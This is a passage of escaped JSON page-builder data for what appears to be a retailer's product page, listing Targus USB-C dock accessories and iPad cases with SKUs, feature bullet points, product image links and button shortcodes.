DOCK180USZ<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd75d2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bcabecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Powers up to 1 large and 1 small device simultaneously<\\/li><li>Supports three connectors for multi-user and multi-device environments<\\/li><li>Self-locking collars ensure tips and power cable stay in place<\\/li><li>Uses existing Targus power cable and power tips from your powered dock (not included)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30e0068\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c4be429\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports USB-C laptops<\\/li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ<\\/li><li>Compact size for easy carrying<\\/li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port<\\/li><li>5 different charge profiles to ensure compatibility<\\/li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c23edb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ea8be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 USB-C\\/F port<\\/li><li>Enables support for legacy host devices<\\/li><li>Uses universal 3-pin power tip support<\\/li><li>For use with DOCK 180<\\/li><li>Supports power delivery charging up to 60W<\\/li><li>Supports USB 3.0 data transfer up 5 Gbps<\\/li><li>1 USB 3.0 Type A\\/M cable<\\/li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72a48df\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"adce2ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d0ec8ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ae9eaf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f4d772a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4e92ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e24acf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c539844\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ce0714\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75cb4ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7bb65b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4d7d888\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5aab643\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9405cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7d72c96\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablet Cases\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ed426c2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"092906a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2d78b2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Multi-Gen for 9.7\\\" IPad Pro, iPad Air 1, And 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ634GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"93dca52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ab79003\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3D Protection<\\/strong><strong>\\u2122 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">Multi-Gen for <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">9.7 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">iPad Pro, iPad Air 1, and 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ635GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f08dfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"516eeda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Pro-Tek Rotating iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73711GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98a279c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3fdbec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"36a5239\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ634GL_FRONT_grande.png?v=1549412474\\\" alt=\\\"Black VersaVu\\u00ae Classic Case (Black) for iPad\\u00ae (2017\\/2018) (THZ634GL) - Front\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"958ad63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c2df414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed59759\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"910248c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ73711GL_MAIN1_grande.png?v=1569597181\\\" alt=\\\"Pro-Tek Rotating Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\\\" width=\\\"198\\\" height=\\\"198\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fba5ec6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e24f29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1914c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape views<\\/li><li>Adjustable viewing angles and comfortable typing angle<\\/li><li>Precision cut access to controls, ports, and camera<\\/li><li>Tray design enhances audio performance<\\/li><li>Integrated stylus holder protects your Apple Pencil\\u2122 or stylus<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Convenient sleep\\/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b20e73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a748414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Infinite viewing angles plus comfortable typing position<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Flexible tray with reinforced corners and bezel protection<\\/li><li>Precision-cut access to controls, ports, and camera lenses<\\/li><li>Easy-grip textured cover with secure magnetic wrap closure<\\/li><li>Tray design enhances audio performance<\\/li><li>Convenient sleep\\/wake function works with iPad Pro\\u00a0 (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ffba5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ba8511\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Color Black \\/ Charcoal &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design enhances protection<\\/li><li>Reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision-cut access to controls, ports, and camera<\\/li><li>Audio-enhancing sound scoops boost sound performance<\\/li><li>Secure magnetic wrap closure<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876b52c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"060847f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"29c5815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9410617\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ef66c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b29bf2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da0f29b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0a24c5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a7e46e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"356bcf5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7e3c56\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8b4c09e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"178c12b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Click-In iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73608GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c0be7cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da27b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu <\\/strong><strong>iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc07dd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"76e312e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu Signature iPad 9.7\\\" <\\/strong><strong>2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73902GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a601f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6e3305b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cff07c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73608GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"Click-In Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d78178e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c49cf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73803GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6eaf744\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"043a47e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73902GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Signature Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b4b865\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"246c1eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4857c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black\\/Charcoal, Rose Gold &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports, and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e18e471\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04d07d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal, Blue &amp; Red<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d27da\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9b51775\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe6de1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6895690\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cac6c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c724b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"afa9c21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c4b6b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a983d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0414077\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e27080\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"52a45e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1748b19\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"24f99b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7472688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e19a656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d135e68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek <\\/strong><strong>11-inch\\u00a0 <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c5f1a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"94b3c2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74502GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc6acc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9268480\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0e368ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"039f013\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d9e6d7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"77e1d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e079a49\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"192\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8b54b12\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8672d06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d70140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black &amp; Gold<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ce129\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a2e1c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a76315d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c26b89d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a780230\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8102767\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e736638\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e712cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9336132\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3b49729\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f3df92b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6c073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b7d1d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e683a6d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f005697\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3c683c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cfc8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch<\\/strong><strong> iPad<\\/strong><strong>\\u00ae 